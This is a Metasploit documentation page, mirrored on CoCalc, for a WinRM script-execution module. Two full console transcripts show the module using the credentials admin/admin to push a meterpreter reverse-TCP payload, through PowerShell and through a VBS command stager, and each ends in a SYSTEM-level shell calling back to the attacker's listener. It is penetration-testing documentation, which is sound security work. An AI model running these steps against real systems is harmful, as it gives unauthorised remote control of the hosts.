CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/winrm/winrm_script_exec.md
Views: 11789

Vulnerable Application

WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.

Example Usage

Windows 2008

Powershell 2.0 is used for payload delivery here

msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf  exploit(winrm_script_exec) > exploit
[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] checking for Powershell 2.0
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100
meterpreter > 
[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (608)
[+] Migrating to 568
[+] Successfully migrated to process 
meterpreter > sysinfo
gComputer        : WIN-JZF4OTQMX4W
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
gServer username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 568
meterpreter >

VBS CmdStager is used for payload delivery here

msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(winrm_script_exec) > set USERNAME admin
USERNAME => admin
msf exploit(winrm_script_exec) > set PASSWORD admin
PASSWORD => admin
msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
LHOST => 192.168.198.138
msf exploit(winrm_script_exec) > set LPORT 4444
LPORT => 4444
msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
RHOST => 192.168.198.130
msf  exploit(winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf  exploit(winrm_script_exec) > exploit
[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] User selected the FORCE_VBS option
[*] Command Stager progress -   2.01% done (2046/101936 bytes)
[*] Command Stager progress -   4.01% done (4092/101936 bytes)
[*] Command Stager progress -   6.02% done (6138/101936 bytes)
[*] Command Stager progress -   8.03% done (8184/101936 bytes)
[*] Command Stager progress -  10.04% done (10230/101936 bytes)
[*] Command Stager progress -  12.04% done (12276/101936 bytes)
[*] Command Stager progress -  14.05% done (14322/101936 bytes)
[*] Command Stager progress -  16.06% done (16368/101936 bytes)
[*] Command Stager progress -  18.06% done (18414/101936 bytes)
[*] Command Stager progress -  20.07% done (20460/101936 bytes)
[*] Command Stager progress -  22.08% done (22506/101936 bytes)
[*] Command Stager progress -  24.09% done (24552/101936 bytes)
[*] Command Stager progress -  26.09% done (26598/101936 bytes)
[*] Command Stager progress -  28.10% done (28644/101936 bytes)
[*] Command Stager progress -  30.11% done (30690/101936 bytes)
[*] Command Stager progress -  32.11% done (32736/101936 bytes)
[*] Command Stager progress -  34.12% done (34782/101936 bytes)
[*] Command Stager progress -  36.13% done (36828/101936 bytes)
[*] Command Stager progress -  38.14% done (38874/101936 bytes)
[*] Command Stager progress -  40.14% done (40920/101936 bytes)
[*] Command Stager progress -  42.15% done (42966/101936 bytes)
[*] Command Stager progress -  44.16% done (45012/101936 bytes)
[*] Command Stager progress -  46.16% done (47058/101936 bytes)
[*] Command Stager progress -  48.17% done (49104/101936 bytes)
[*] Command Stager progress -  50.18% done (51150/101936 bytes)
[*] Command Stager progress -  52.19% done (53196/101936 bytes)
[*] Command Stager progress -  54.19% done (55242/101936 bytes)
[*] Command Stager progress -  56.20% done (57288/101936 bytes)
[*] Command Stager progress -  58.21% done (59334/101936 bytes)
[*] Command Stager progress -  60.21% done (61380/101936 bytes)
[*] Command Stager progress -  62.22% done (63426/101936 bytes)
[*] Command Stager progress -  64.23% done (65472/101936 bytes)
[*] Command Stager progress -  66.24% done (67518/101936 bytes)
[*] Command Stager progress -  68.24% done (69564/101936 bytes)
[*] Command Stager progress -  70.25% done (71610/101936 bytes)
[*] Command Stager progress -  72.26% done (73656/101936 bytes)
[*] Command Stager progress -  74.26% done (75702/101936 bytes)
[*] Command Stager progress -  76.27% done (77748/101936 bytes)
[*] Command Stager progress -  78.28% done (79794/101936 bytes)
[*] Command Stager progress -  80.29% done (81840/101936 bytes)
[*] Command Stager progress -  82.29% done (83886/101936 bytes)
[*] Command Stager progress -  84.30% done (85932/101936 bytes)
[*] Command Stager progress -  86.31% done (87978/101936 bytes)
[*] Command Stager progress -  88.31% done (90024/101936 bytes)
[*] Command Stager progress -  90.32% done (92070/101936 bytes)
[*] Command Stager progress -  92.33% done (94116/101936 bytes)
[*] Command Stager progress -  94.34% done (96162/101936 bytes)
[*] Command Stager progress -  96.34% done (98208/101936 bytes)
[*] Command Stager progress -  98.35% done (100252/101936 bytes)
[*] Sending stage (752128 bytes) to 192.168.198.130
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100
[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: mSPvA.exe (3548)
[+] Migrating to 580
[+] Successfully migrated to process 
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter > getpid
Current pid: 580
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-OPAUFTQFWTB
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >